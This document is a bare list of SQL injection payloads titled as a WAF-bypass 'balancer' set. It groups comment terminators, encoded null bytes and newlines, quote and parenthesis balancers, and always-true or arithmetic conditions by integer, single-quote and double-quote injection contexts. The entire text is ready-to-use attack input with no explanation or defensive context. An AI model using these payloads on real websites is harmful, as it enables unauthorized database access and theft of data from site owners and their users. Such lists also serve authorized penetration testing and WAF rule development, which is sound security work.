String Waf Bypass Balance SQLi

(+) Balancer Integer Based (+)

--
-- -
--+-
--+
)--
)-- -
)--+-
)--+
))--
))-- -
))--+-
;%00
;%0A
;%0b
);%00
));%00
%23
%60
%90
And 1=1
And '1'='1
And (1)=(1
php?id=(1)-- -

(+) String Based (+)

'--+-
')-- -
')--+-
')--+
'))-- -
'))--+-
'))--
';%00
');%00
'));%00
');%0A
'));%0A
');%0b
'));%0b
'%23
'%60
'%90
' And 1=1
' And '1'='1
' And (1)=(1
php?id=(1')-- -

(+) String Based Double Quotes (+)

"--+-
")-- -
")--+-
")--+
"))-- -
"))--+-
"))--
";%00
");%00
"));%00
"%23
"%60
"%90
" And 1=1
" And '1'='1
" And (1)=(1
php?id=(1")-- -

(+) Balancer (+)

/*
--/**
--/*
\\--+
\\-- +
#--+
#-- -
--++
+--+
'))%23
a'))%60
'));%00
');%00
')order by 10;%00

AND'1
or'1
AND1=1
And 1=0
') and true
') and false
') and point
') or true
') or false
' and true
' and false
' or true
' or false
And x(point(0,0))-- -

(+) Calculation (+)

or 1=1
or 0=0
or 25-10-5=5
or 20-5-5=10
or 25-5-5=15
or 5*5*1=25
or 5*5+5=30
Or 1 Less Than 0
